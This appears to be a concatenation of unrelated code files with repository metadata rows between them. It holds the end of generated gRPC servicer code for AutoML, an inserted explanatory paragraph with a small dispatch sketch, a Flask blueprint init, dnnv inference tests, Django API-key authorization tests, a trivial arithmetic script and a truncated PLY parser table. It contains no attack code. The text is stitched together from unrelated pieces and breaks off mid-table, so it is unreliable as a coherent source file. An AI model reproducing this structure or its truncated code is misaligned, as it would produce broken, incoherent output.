            response_serializer=google_dot_longrunning_dot_operations__pb2.Operation.SerializeToString,
        ),
        'GetModel': grpc.unary_unary_rpc_method_handler(
            servicer.GetModel,
            request_deserializer=google_dot_cloud_dot_automl__v1beta1_dot_proto_dot_service__pb2.GetModelRequest.FromString,
            response_serializer=google_dot_cloud_dot_automl__v1beta1_dot_proto_dot_model__pb2.Model.SerializeToString,
        ),
        'ListModels': grpc.unary_unary_rpc_method_handler(
            servicer.ListModels,
            request_deserializer=google_dot_cloud_dot_automl__v1beta1_dot_proto_dot_service__pb2.ListModelsRequest.FromString,
            response_serializer=google_dot_cloud_dot_automl__v1beta1_dot_proto_dot_service__pb2.ListModelsResponse.SerializeToString,
        ),
        'DeleteModel': grpc.unary_unary_rpc_method_handler(
            servicer.DeleteModel,
            request_deserializer=google_dot_cloud_dot_automl__v1beta1_dot_proto_dot_service__pb2.DeleteModelRequest.FromString,
            response_serializer=google_dot_longrunning_dot_operations__pb2.Operation.SerializeToString,
        ),
        'DeployModel': grpc.unary_unary_rpc_method_handler(
            servicer.DeployModel,
            request_deserializer=google_dot_cloud_dot_automl__v1beta1_dot_proto_dot_service__pb2.DeployModelRequest.FromString,
            response_serializer=google_dot_longrunning_dot_operations__pb2.Operation.SerializeToString,
        ),
        'UndeployModel': grpc.unary_unary_rpc_method_handler(
            servicer.UndeployModel,
            request_deserializer=google_dot_cloud_dot_automl__v1beta1_dot_proto_dot_service__pb2.UndeployModelRequest.FromString,
            response_serializer=google_dot_longrunning_dot_operations__pb2.Operation.SerializeToString,
        ),
        'GetModelEvaluation': grpc.unary_unary_rpc_method_handler(
            servicer.GetModelEvaluation,
            request_deserializer=google_dot_cloud_dot_automl__v1beta1_dot_proto_dot_service__pb2.GetModelEvaluationRequest.FromString,
            response_serializer=google_dot_cloud_dot_automl__v1beta1_dot_proto_dot_model__evaluation__pb2.ModelEvaluation.SerializeToString,
        ),
        'ListModelEvaluations': grpc.unary_unary_rpc_method_handler(
            servicer.ListModelEvaluations,
            request_deserializer=google_dot_cloud_dot_automl__v1beta1_dot_proto_dot_service__pb2.ListModelEvaluationsRequest.FromString,
            response_serializer=google_dot_cloud_dot_automl__v1beta1_dot_proto_dot_service__pb2.ListModelEvaluationsResponse.SerializeToString,
        ),
    }
    generic_handler = grpc.method_handlers_generic_handler(
        'google.cloud.automl.v1beta1.AutoMl', rpc_method_handlers)
    server.add_generic_rpc_handlers((generic_handler,))
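The `add_AutoMlServicer_to_server` helper above is the standard generated wiring: a dict from method names to handlers, exposed to the server as one generic handler keyed by fully qualified RPC names. A dependency-free sketch of that dispatch pattern (class and method names here are illustrative, not part of the gRPC API):

```python
class GenericHandler:
    """Maps fully qualified RPC names to handler callables."""

    def __init__(self, service_name, method_handlers):
        # gRPC keys handlers by '/package.Service/Method' strings.
        self.handlers = {
            "/{}/{}".format(service_name, method): fn
            for method, fn in method_handlers.items()
        }

    def dispatch(self, rpc_name, request):
        fn = self.handlers.get(rpc_name)
        if fn is None:
            # Mirrors the UNIMPLEMENTED default in the generated servicer.
            raise NotImplementedError("Method not implemented!")
        return fn(request)


handler = GenericHandler(
    "google.cloud.automl.v1beta1.AutoMl",
    {"GetDataset": lambda request: {"name": request}},
)
```

Registering the dict once, rather than one route per method, is what lets the generated code stay a flat table that is trivial to regenerate.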
| 52.367412 | 143 | 0.78842 | 1,873 | 16,391 | 6.450614 | 0.093967 | 0.069939 | 0.053302 | 0.064724 | 0.830988 | 0.818159 | 0.810545 | 0.763284 | 0.705595 | 0.698312 | 0 | 0.013924 | 0.141236 | 16,391 | 312 | 144 | 52.535256 | 0.844416 | 0.148252 | 0 | 0.350711 | 1 | 0 | 0.111071 | 0.051668 | 0 | 0 | 0 | 0 | 0 | 1 | 0.075829 | false | 0 | 0.061611 | 0 | 0.146919 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
76b77e633f5d78d6420a664009b82fb6e6631013 | 107 | py | Python | app/blueprints/admin_ext/__init__.py | lvyaoo/api-demo | f45c05c154385510572b5200b74dcbbfdb7e234c | [
"MIT"
] | null | null | null | app/blueprints/admin_ext/__init__.py | lvyaoo/api-demo | f45c05c154385510572b5200b74dcbbfdb7e234c | [
"MIT"
] | null | null | null | app/blueprints/admin_ext/__init__.py | lvyaoo/api-demo | f45c05c154385510572b5200b74dcbbfdb7e234c | [
"MIT"
] | null | null | null | from flask import Blueprint
bp_admin_ext = Blueprint('bp_admin_ext', __name__)
from . import extensions
| 15.285714 | 50 | 0.794393 | 15 | 107 | 5.133333 | 0.6 | 0.285714 | 0.415584 | 0.493506 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.140187 | 107 | 6 | 51 | 17.833333 | 0.836957 | 0 | 0 | 0 | 0 | 0 | 0.11215 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.666667 | 0 | 0.666667 | 0.666667 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 1 | 0 | 8 |
4f5cc8ab0c76e3412fe0f56da6528917303d2042 | 4,534 | py | Python | tests/unit_tests/test_properties/test_visitors/test_DetailsInference/test_IfThenElse.py | samysweb/dnnv | 58fb95b7300914d9da28eed86c39eca473b1aaef | [
"MIT"
] | 5 | 2022-01-28T20:30:34.000Z | 2022-03-17T09:26:52.000Z | tests/unit_tests/test_properties/test_visitors/test_DetailsInference/test_IfThenElse.py | samysweb/dnnv | 58fb95b7300914d9da28eed86c39eca473b1aaef | [
"MIT"
] | 9 | 2022-01-27T03:50:28.000Z | 2022-02-08T18:42:17.000Z | tests/unit_tests/test_properties/test_visitors/test_DetailsInference/test_IfThenElse.py | samysweb/dnnv | 58fb95b7300914d9da28eed86c39eca473b1aaef | [
"MIT"
] | 2 | 2022-02-03T17:32:43.000Z | 2022-03-24T16:38:49.000Z | import numpy as np
import pytest
from dnnv.properties.expressions import *
from dnnv.properties.visitors import DetailsInference, DNNVShapeError, DNNVTypeError
def test_IfThenElse_symbols():
    inference = DetailsInference()

    c, t, f = Symbol("c"), Symbol("t"), Symbol("f")
    expr = IfThenElse(c, t, f)
    inference.visit(expr)

    assert inference.shapes[c].is_concrete
    assert not inference.shapes[t].is_concrete
    assert not inference.shapes[f].is_concrete
    assert not inference.shapes[expr].is_concrete
    assert inference.types[c].is_concrete
    assert not inference.types[t].is_concrete
    assert not inference.types[f].is_concrete
    assert not inference.types[expr].is_concrete

    assert inference.shapes[c].value == ()
    assert inference.types[c].value == bool


def test_IfThenElse_constant_cond():
    inference = DetailsInference()

    c, t, f = Constant(False), Symbol("t"), Symbol("f")
    expr = IfThenElse(c, t, f)
    inference.visit(expr)

    assert inference.shapes[c].is_concrete
    assert not inference.shapes[t].is_concrete
    assert not inference.shapes[f].is_concrete
    assert not inference.shapes[expr].is_concrete
    assert inference.types[c].is_concrete
    assert not inference.types[t].is_concrete
    assert not inference.types[f].is_concrete
    assert not inference.types[expr].is_concrete

    assert inference.shapes[c].value == ()
    assert inference.types[c].value == bool


def test_IfThenElse_constant_true_expr():
    inference = DetailsInference()

    c, t, f = Symbol("c"), Constant(np.array((1, 2))), Symbol("f")
    expr = IfThenElse(c, t, f)
    inference.visit(expr)

    assert inference.shapes[c].is_concrete
    assert inference.shapes[t].is_concrete
    assert inference.shapes[f].is_concrete
    assert inference.shapes[expr].is_concrete
    assert inference.types[c].is_concrete
    assert inference.types[t].is_concrete
    assert inference.types[f].is_concrete
    assert inference.types[expr].is_concrete

    assert inference.shapes[c].value == ()
    assert inference.types[c].value == bool
    assert inference.shapes[t].value == t.value.shape
    assert inference.types[t].value == t.value.dtype
    assert inference.shapes[f].value == t.value.shape
    assert inference.types[f].value == t.value.dtype
    assert inference.shapes[expr].value == t.value.shape
    assert inference.types[expr].value == t.value.dtype


def test_IfThenElse_constant_false_expr():
    inference = DetailsInference()

    c, t, f = Symbol("c"), Symbol("t"), Constant(np.array((1, 2)))
    expr = IfThenElse(c, t, f)
    inference.visit(expr)

    assert inference.shapes[c].is_concrete
    assert inference.shapes[t].is_concrete
    assert inference.shapes[f].is_concrete
    assert inference.shapes[expr].is_concrete
    assert inference.types[c].is_concrete
    assert inference.types[t].is_concrete
    assert inference.types[f].is_concrete
    assert inference.types[expr].is_concrete

    assert inference.shapes[c].value == ()
    assert inference.types[c].value == bool
    assert inference.shapes[t].value == f.value.shape
    assert inference.types[t].value == f.value.dtype
    assert inference.shapes[f].value == f.value.shape
    assert inference.types[f].value == f.value.dtype
    assert inference.shapes[expr].value == f.value.shape
    assert inference.types[expr].value == f.value.dtype


def test_IfThenElse_incompatible_shapes():
    inference = DetailsInference()

    with get_context():
        c, t, f = (
            Symbol("c"),
            Constant(np.random.rand(3, 5)),
            Constant(np.random.rand(1, 2)),
        )
        expr = IfThenElse(c, t, f)
        with pytest.raises(DNNVShapeError):
            inference.visit(expr)

    with get_context():
        c, t, f = Constant(np.random.rand(3, 5) > 0.5), Symbol("true"), Symbol("false")
        expr = IfThenElse(c, t, f)
        with pytest.raises(DNNVShapeError):
            inference.visit(expr)


def test_IfThenElse_incompatible_types():
    inference = DetailsInference()

    with get_context():
        c, t, f = (
            Symbol("c"),
            Constant(np.random.rand(3, 5)),
            Constant(np.random.rand(3, 5) > 0.5),
        )
        expr = IfThenElse(c, t, f)
        with pytest.raises(DNNVTypeError):
            inference.visit(expr)

    with get_context():
        c, t, f = Constant(8), Symbol("true"), Symbol("false")
        expr = IfThenElse(c, t, f)
        with pytest.raises(DNNVTypeError):
            inference.visit(expr)
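The incompatible-shape cases above come down to element-wise shape compatibility between the condition and the two branches. One plausible version of that check, in the NumPy broadcasting style (a hypothetical helper, not part of dnnv's visitors):

```python
def shapes_compatible(a, b):
    """NumPy-style broadcast check: trailing dims must match or be 1.

    a, b: shape tuples such as (3, 5) or (1, 2).
    """
    for x, y in zip(reversed(a), reversed(b)):
        if x != y and x != 1 and y != 1:
            return False
    return True
```

Under this rule, `(3, 5)` and `(1, 2)` fail (5 vs 2, neither is 1), which is exactly the pair the first `DNNVShapeError` case exercises; the actual inference may impose stricter equality.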
| 31.929577 | 87 | 0.674019 | 600 | 4,534 | 5.001667 | 0.086667 | 0.199933 | 0.17061 | 0.166611 | 0.916694 | 0.882039 | 0.882039 | 0.74875 | 0.727757 | 0.702099 | 0 | 0.005226 | 0.198059 | 4,534 | 141 | 88 | 32.156028 | 0.820132 | 0 | 0 | 0.703704 | 0 | 0 | 0.006396 | 0 | 0 | 0 | 0 | 0 | 0.481481 | 1 | 0.055556 | false | 0 | 0.037037 | 0 | 0.092593 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 9 |
4f65766abb8ecd0bfcd72618cfcd3ec22559b1bb | 146 | py | Python | tirelire-auth/app/service_layer/unit_of_work/__init__.py | AgRenaud/tirelire | 0ac42dbf735dea4ecb741057bd037c18657b95c7 | [
"MIT"
] | null | null | null | tirelire-auth/app/service_layer/unit_of_work/__init__.py | AgRenaud/tirelire | 0ac42dbf735dea4ecb741057bd037c18657b95c7 | [
"MIT"
] | null | null | null | tirelire-auth/app/service_layer/unit_of_work/__init__.py | AgRenaud/tirelire | 0ac42dbf735dea4ecb741057bd037c18657b95c7 | [
"MIT"
] | null | null | null | from app.service_layer.unit_of_work.unit_of_work import UnitOfWork
from app.service_layer.unit_of_work.sqlalchemy_uow import SQLAlchemyUnitOfWork
| 48.666667 | 78 | 0.90411 | 23 | 146 | 5.347826 | 0.521739 | 0.146341 | 0.243902 | 0.308943 | 0.471545 | 0.471545 | 0.471545 | 0 | 0 | 0 | 0 | 0 | 0.054795 | 146 | 2 | 79 | 73 | 0.891304 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
8c458a6817a0d481c7a6338570265190b823d0b4 | 25 | py | Python | b.py | usha324/python | 7aa967b8dac8cd0c466652db448cb7e405821389 | [
"bzip2-1.0.6"
] | null | null | null | b.py | usha324/python | 7aa967b8dac8cd0c466652db448cb7e405821389 | [
"bzip2-1.0.6"
] | null | null | null | b.py | usha324/python | 7aa967b8dac8cd0c466652db448cb7e405821389 | [
"bzip2-1.0.6"
] | null | null | null | x=17/2%2*3**3
print(x)
| 8.333333 | 14 | 0.52 | 8 | 25 | 1.625 | 0.625 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.285714 | 0.16 | 25 | 2 | 15 | 12.5 | 0.333333 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0.5 | 1 | 1 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 7 |
8c57c2322c54f644f97d17025e73554430e0a592 | 5,181 | py | Python | tests/app/tests/functional/test_item_endpoints.py | suneel0101/django-easyrest | 62c5a8883d5e7adcea8cd95846881acb31991c85 | [
"MIT"
] | null | null | null | tests/app/tests/functional/test_item_endpoints.py | suneel0101/django-easyrest | 62c5a8883d5e7adcea8cd95846881acb31991c85 | [
"MIT"
] | 3 | 2020-02-11T22:12:09.000Z | 2021-06-10T17:40:29.000Z | tests/app/tests/functional/test_item_endpoints.py | suneel0101/django-easyrest | 62c5a8883d5e7adcea8cd95846881acb31991c85 | [
"MIT"
] | null | null | null | import json
from sure import expect, scenario
from django.contrib.auth.models import User
from django.core.urlresolvers import reverse
from django.test.client import Client
from easyrest.models import APIKey
from app.models import Item, UserItem
client = Client()
def create_items(context):
    # Delete all items
    Item.objects.all().delete()
    # Create 30 items
    for x in range(30):
        Item.objects.create(
            name="my name is {}".format(x),
            text="my text is {}".format(x),
            is_active=x % 2,
            status=x)


@scenario(create_items)
def test_get_item(context):
    response = client.get(reverse('item_item', kwargs={"_id": 1}),
                          content_type='application/json')
    expected_response_content = {
        "id": 1,
        "text": "my text is 0",
        "popularity": 0}
    expect(json.loads(response.content)).to.equal(expected_response_content)
    expect(response.status_code).to.equal(200)


@scenario(create_items)
def test_get_non_existent_item(context):
    response = client.get(reverse('item_item', kwargs={"_id": 99}),
                          content_type='application/json')
    expected_response_content = {"error": "No result matches id: 99"}
    expect(json.loads(response.content)).to.equal(expected_response_content)
    expect(response.status_code).to.equal(400)


def test_get_item_failed_authorization_without_key():
    APIKey.objects.all().delete()
    response = client.get(reverse('authorized_item_item', kwargs={"_id": 1}),
                          content_type='application/json')
    expect(response.status_code).to.equal(403)


def test_get_item_failed_authorization_with_wrong_key():
    APIKey.objects.all().delete()
    response = client.get(reverse('authorized_item_item', kwargs={"_id": 1}),
                          data={'key': "the-wrong-key"},
                          content_type='application/json')
    expect(response.status_code).to.equal(403)


def test_get_item_authed_successful():
    # Delete all items
    UserItem.objects.all().delete()
    APIKey.objects.all().delete()
    User.objects.all().delete()
    user = User.objects.create(username='tester', password='123')
    user2 = User.objects.create(username='tester2', password='345')
    # Create 30 items
    for x in range(30):
        UserItem.objects.create(
            name="my name is {}".format(x),
            user=[user, user2][x % 2],
            is_active=x % 2)
    apikey = APIKey.objects.create(user=user)
    response = client.get(reverse('authorized_item_item', kwargs={"_id": 1}),
                          data={'apikey': apikey.token},
                          content_type='application/json')
    expected_response_content = {
        "id": 1,
        "user_id": user.id,
        "name": "my name is 0"}
    expect(json.loads(response.content)).to.equal(expected_response_content)
    expect(response.status_code).to.equal(200)


def test_get_item_filter_by_user_with_access():
    # Delete all items
    UserItem.objects.all().delete()
    APIKey.objects.all().delete()
    User.objects.all().delete()
    user = User.objects.create(username='tester', password='123')
    user2 = User.objects.create(username='tester2', password='345')
    # Create 30 items
    for x in range(30):
        UserItem.objects.create(
            name="my name is {}".format(x),
            user=[user, user2][x % 2],
            is_active=x % 2)
    apikey = APIKey.objects.create(user=user)
    response = client.get(reverse('by_user_authorized_item_item',
                                  kwargs={"_id": 1}),
                          data={'apikey': apikey.token},
                          content_type='application/json')
    expected_response_content = {
        "id": 1,
        "user_id": user.id,
        "name": "my name is 0"}
    expect(json.loads(response.content)).to.equal(expected_response_content)
    expect(response.status_code).to.equal(200)


def test_get_item_filter_by_user_without_access():
    # Delete all items
    UserItem.objects.all().delete()
    APIKey.objects.all().delete()
    User.objects.all().delete()
    user = User.objects.create(username='tester', password='123')
    user2 = User.objects.create(username='tester2', password='345')
    # Create 30 items
    for x in range(30):
        UserItem.objects.create(
            name="my name is {}".format(x),
            user=[user, user2][x % 2],
            is_active=x % 2)
    apikey = APIKey.objects.create(user=user)
    response = client.get(reverse('by_user_authorized_item_item',
                                  kwargs={"_id": 2}),
                          data={'apikey': apikey.token},
                          content_type='application/json')
    expected_response_content = {
        "error": "You do not have access to this data"}
    expect(json.loads(response.content)).to.equal(expected_response_content)
    expect(response.status_code).to.equal(400)


def test_get_item_with_non_GET_method():
    response = client.post(reverse('item_item', kwargs={"_id": 1}),
                           content_type='application/json')
    expect(response.status_code).to.equal(403)
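The authorization tests above all exercise one rule: a request is allowed only when it carries an `apikey` parameter matching a stored token. A framework-free sketch of that guard (function and names are illustrative, not easyrest's API):

```python
def authorize(params, valid_tokens):
    """Return (status, error) for an API-key guarded endpoint.

    params: dict of query parameters from the request.
    valid_tokens: set of currently issued API-key tokens.
    """
    token = params.get("apikey")
    if token is None or token not in valid_tokens:
        # Missing key and wrong key both yield 403, matching the tests.
        return 403, "Forbidden"
    return 200, None
```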
| 34.54 | 77 | 0.626327 | 640 | 5,181 | 4.89375 | 0.148438 | 0.071839 | 0.061303 | 0.040868 | 0.84387 | 0.84387 | 0.813218 | 0.813218 | 0.775862 | 0.767561 | 0 | 0.023297 | 0.237792 | 5,181 | 149 | 78 | 34.771812 | 0.769815 | 0.025285 | 0 | 0.711712 | 0 | 0 | 0.118627 | 0.011109 | 0 | 0 | 0 | 0 | 0 | 1 | 0.081081 | false | 0.054054 | 0.063063 | 0 | 0.144144 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 8 |
8c613a1dc86c3a13ee6eecbe61e6c1cf76c895d0 | 28,150 | py | Python | parsetab.py | Lee-Junhee/graphics | 2fe9c838b8749465547ed2bdb00938eda69275a3 | [
"MIT"
] | null | null | null | parsetab.py | Lee-Junhee/graphics | 2fe9c838b8749465547ed2bdb00938eda69275a3 | [
"MIT"
] | null | null | null | parsetab.py | Lee-Junhee/graphics | 2fe9c838b8749465547ed2bdb00938eda69275a3 | [
"MIT"
] | null | null | null |
# parsetab.py
# This file is automatically generated. Do not edit.
# pylint: disable=W,C,R
_tabversion = '3.10'
_lr_method = 'LALR'
_lr_signature = 'AMBIENT BASENAME BOX CAMERA CO COMMENT CONSTANTS DISPLAY DOUBLE FOCAL FRAMES FXN GENERATE_RAYFILES ID INT LIGHT LINE MESH MOVE POP PUSH ROTATE SAVE SAVE_COORDS SAVE_KNOBS SCALE SCREEN SET SET_KNOBS SHADING SHADING_TYPE SPHERE STRING TEXTURE TORUS TWEEN VARY WEB XYZinput :\n | command inputcommand : COMMENTSYMBOL : XYZ\n | IDTEXT : SYMBOL\n | STRINGNUMBER : DOUBLEcommand : POP\n | PUSHcommand : SCREEN NUMBER NUMBER\n | SCREENcommand : SAVE TEXT TEXTcommand : DISPLAYcommand : SPHERE NUMBER NUMBER NUMBER NUMBER\n | SPHERE SYMBOL NUMBER NUMBER NUMBER NUMBER\n | SPHERE NUMBER NUMBER NUMBER NUMBER SYMBOL\n | SPHERE SYMBOL NUMBER NUMBER NUMBER NUMBER SYMBOLcommand : TORUS NUMBER NUMBER NUMBER NUMBER NUMBER\n | TORUS NUMBER NUMBER NUMBER NUMBER NUMBER SYMBOL\n | TORUS SYMBOL NUMBER NUMBER NUMBER NUMBER NUMBER\n | TORUS SYMBOL NUMBER NUMBER NUMBER NUMBER NUMBER SYMBOLcommand : BOX NUMBER NUMBER NUMBER NUMBER NUMBER NUMBER\n | BOX NUMBER NUMBER NUMBER NUMBER NUMBER NUMBER SYMBOL\n | BOX SYMBOL NUMBER NUMBER NUMBER NUMBER NUMBER NUMBER\n | BOX SYMBOL NUMBER NUMBER NUMBER NUMBER NUMBER NUMBER SYMBOLcommand : LINE NUMBER NUMBER NUMBER NUMBER NUMBER NUMBER\n | LINE NUMBER NUMBER NUMBER NUMBER NUMBER NUMBER SYMBOL\n | LINE NUMBER NUMBER NUMBER SYMBOL NUMBER NUMBER NUMBER\n | LINE NUMBER NUMBER NUMBER SYMBOL NUMBER NUMBER NUMBER SYMBOL\n | LINE SYMBOL NUMBER NUMBER NUMBER NUMBER NUMBER NUMBER\n | LINE SYMBOL NUMBER NUMBER NUMBER NUMBER NUMBER NUMBER SYMBOL\n | LINE SYMBOL NUMBER NUMBER NUMBER SYMBOL NUMBER NUMBER NUMBER\n | LINE SYMBOL NUMBER NUMBER NUMBER SYMBOL NUMBER NUMBER NUMBER SYMBOLcommand : MOVE NUMBER NUMBER NUMBER SYMBOL\n | MOVE NUMBER NUMBER NUMBERcommand : SCALE NUMBER NUMBER NUMBER SYMBOL\n | SCALE NUMBER NUMBER NUMBERcommand : ROTATE XYZ NUMBER SYMBOL\n | ROTATE XYZ NUMBERcommand : FRAMES NUMBERcommand : BASENAME TEXTcommand : VARY SYMBOL NUMBER NUMBER NUMBER NUMBER\n | VARY SYMBOL NUMBER NUMBER FXNcommand : SET SYMBOL NUMBER\n | SET_KNOBS NUMBERcommand : AMBIENT NUMBER NUMBER NUMBERcommand : CONSTANTS SYMBOL NUMBER NUMBER NUMBER NUMBER NUMBER NUMBER NUMBER NUMBER NUMBER\n | CONSTANTS SYMBOL NUMBER NUMBER NUMBER NUMBER NUMBER NUMBER NUMBER NUMBER NUMBER NUMBER NUMBER NUMBERcommand : LIGHT SYMBOL NUMBER NUMBER NUMBER NUMBER NUMBER NUMBER\n | LIGHT SYMBOL NUMBER NUMBER NUMBER NUMBER NUMBER NUMBER NUMBER NUMBER NUMBER NUMBER NUMBER NUMBER SYMBOLcommand : SHADING SHADING_TYPEcommand : CAMERA NUMBER NUMBER NUMBER NUMBER NUMBER NUMBERcommand : GENERATE_RAYFILEScommand : MESH CO TEXT\n | MESH SYMBOL CO TEXT\n | MESH CO TEXT SYMBOL\n | MESH SYMBOL CO TEXT SYMBOLcommand : SAVE_KNOBS SYMBOLcommand : SAVE_COORDS SYMBOLcommand : TWEEN NUMBER NUMBER SYMBOL SYMBOLcommand : FOCAL NUMBERcommand : WEBcommand : TEXTURE SYMBOL NUMBER NUMBER NUMBER NUMBER NUMBER NUMBER NUMBER NUMBER NUMBER NUMBER NUMBER NUMBER'
_lr_action_items = {'$end':([0,1,2,3,4,5,6,8,26,32,34,36,38,39,40,41,53,54,57,61,65,66,68,70,71,82,84,89,101,102,103,105,109,110,113,122,123,125,129,130,132,133,134,142,147,148,149,150,152,158,160,161,162,163,164,166,168,170,171,172,173,177,181,190,192,193,],[-1,0,-1,-3,-9,-10,-12,-14,-54,-63,-2,-8,-6,-7,-4,-5,-41,-42,-46,-52,-59,-60,-62,-11,-13,-40,-45,-55,-36,-38,-39,-47,-57,-56,-15,-35,-37,-44,-58,-61,-17,-16,-19,-43,-18,-20,-21,-23,-27,-53,-22,-24,-25,-28,-29,-31,-50,-26,-30,-33,-32,-34,-48,-49,-64,-51,]),'COMMENT':([0,2,3,4,5,6,8,26,32,36,38,39,40,41,53,54,57,61,65,66,68,70,71,82,84,89,101,102,103,105,109,110,113,122,123,125,129,130,132,133,134,142,147,148,149,150,152,158,160,161,162,163,164,166,168,170,171,172,173,177,181,190,192,193,],[3,3,-3,-9,-10,-12,-14,-54,-63,-8,-6,-7,-4,-5,-41,-42,-46,-52,-59,-60,-62,-11,-13,-40,-45,-55,-36,-38,-39,-47,-57,-56,-15,-35,-37,-44,-58,-61,-17,-16,-19,-43,-18,-20,-21,-23,-27,-53,-22,-24,-25,-28,-29,-31,-50,-26,-30,-33,-32,-34,-48,-49,-64,-51,]),'POP':([0,2,3,4,5,6,8,26,32,36,38,39,40,41,53,54,57,61,65,66,68,70,71,82,84,89,101,102,103,105,109,110,113,122,123,125,129,130,132,133,134,142,147,148,149,150,152,158,160,161,162,163,164,166,168,170,171,172,173,177,181,190,192,193,],[4,4,-3,-9,-10,-12,-14,-54,-63,-8,-6,-7,-4,-5,-41,-42,-46,-52,-59,-60,-62,-11,-13,-40,-45,-55,-36,-38,-39,-47,-57,-56,-15,-35,-37,-44,-58,-61,-17,-16,-19,-43,-18,-20,-21,-23,-27,-53,-22,-24,-25,-28,-29,-31,-50,-26,-30,-33,-32,-34,-48,-49,-64,-51,]),'PUSH':([0,2,3,4,5,6,8,26,32,36,38,39,40,41,53,54,57,61,65,66,68,70,71,82,84,89,101,102,103,105,109,110,113,122,123,125,129,130,132,133,134,142,147,148,149,150,152,158,160,161,162,163,164,166,168,170,171,172,173,177,181,190,192,193,],[5,5,-3,-9,-10,-12,-14,-54,-63,-8,-6,-7,-4,-5,-41,-42,-46,-52,-59,-60,-62,-11,-13,-40,-45,-55,-36,-38,-39,-47,-57,-56,-15,-35,-37,-44,-58,-61,-17,-16,-19,-43,-18,-20,-21,-23,-27,-53,-22,-24,-25,-28,-29,-31,-50,-26,-30,-33,-32,-34,-48,-49,-64,-51,]),'SCREEN':([0,2,3,4,5,6,8,26,32,36,
38,39,40,41,53,54,57,61,65,66,68,70,71,82,84,89,101,102,103,105,109,110,113,122,123,125,129,130,132,133,134,142,147,148,149,150,152,158,160,161,162,163,164,166,168,170,171,172,173,177,181,190,192,193,],[6,6,-3,-9,-10,-12,-14,-54,-63,-8,-6,-7,-4,-5,-41,-42,-46,-52,-59,-60,-62,-11,-13,-40,-45,-55,-36,-38,-39,-47,-57,-56,-15,-35,-37,-44,-58,-61,-17,-16,-19,-43,-18,-20,-21,-23,-27,-53,-22,-24,-25,-28,-29,-31,-50,-26,-30,-33,-32,-34,-48,-49,-64,-51,]),'SAVE':([0,2,3,4,5,6,8,26,32,36,38,39,40,41,53,54,57,61,65,66,68,70,71,82,84,89,101,102,103,105,109,110,113,122,123,125,129,130,132,133,134,142,147,148,149,150,152,158,160,161,162,163,164,166,168,170,171,172,173,177,181,190,192,193,],[7,7,-3,-9,-10,-12,-14,-54,-63,-8,-6,-7,-4,-5,-41,-42,-46,-52,-59,-60,-62,-11,-13,-40,-45,-55,-36,-38,-39,-47,-57,-56,-15,-35,-37,-44,-58,-61,-17,-16,-19,-43,-18,-20,-21,-23,-27,-53,-22,-24,-25,-28,-29,-31,-50,-26,-30,-33,-32,-34,-48,-49,-64,-51,]),'DISPLAY':([0,2,3,4,5,6,8,26,32,36,38,39,40,41,53,54,57,61,65,66,68,70,71,82,84,89,101,102,103,105,109,110,113,122,123,125,129,130,132,133,134,142,147,148,149,150,152,158,160,161,162,163,164,166,168,170,171,172,173,177,181,190,192,193,],[8,8,-3,-9,-10,-12,-14,-54,-63,-8,-6,-7,-4,-5,-41,-42,-46,-52,-59,-60,-62,-11,-13,-40,-45,-55,-36,-38,-39,-47,-57,-56,-15,-35,-37,-44,-58,-61,-17,-16,-19,-43,-18,-20,-21,-23,-27,-53,-22,-24,-25,-28,-29,-31,-50,-26,-30,-33,-32,-34,-48,-49,-64,-51,]),'SPHERE':([0,2,3,4,5,6,8,26,32,36,38,39,40,41,53,54,57,61,65,66,68,70,71,82,84,89,101,102,103,105,109,110,113,122,123,125,129,130,132,133,134,142,147,148,149,150,152,158,160,161,162,163,164,166,168,170,171,172,173,177,181,190,192,193,],[9,9,-3,-9,-10,-12,-14,-54,-63,-8,-6,-7,-4,-5,-41,-42,-46,-52,-59,-60,-62,-11,-13,-40,-45,-55,-36,-38,-39,-47,-57,-56,-15,-35,-37,-44,-58,-61,-17,-16,-19,-43,-18,-20,-21,-23,-27,-53,-22,-24,-25,-28,-29,-31,-50,-26,-30,-33,-32,-34,-48,-49,-64,-51,]),'TORUS':([0,2,3,4,5,6,8,26,32,36,38,39,40,41,53,54,57,61,65,66,68,70,71,82,84,89,101,102,103,105,109,110,113,122,123,125,129,130,132,133,134,142,147,148,149,150,152,158,160,161,162,163,164,166,168,170,171,172,173,177,181,190,192,193,],[10,10,-3,-9,-10,-12,-14,-54,-63,-8,-6,-7,-4,-5,-41,-42,-4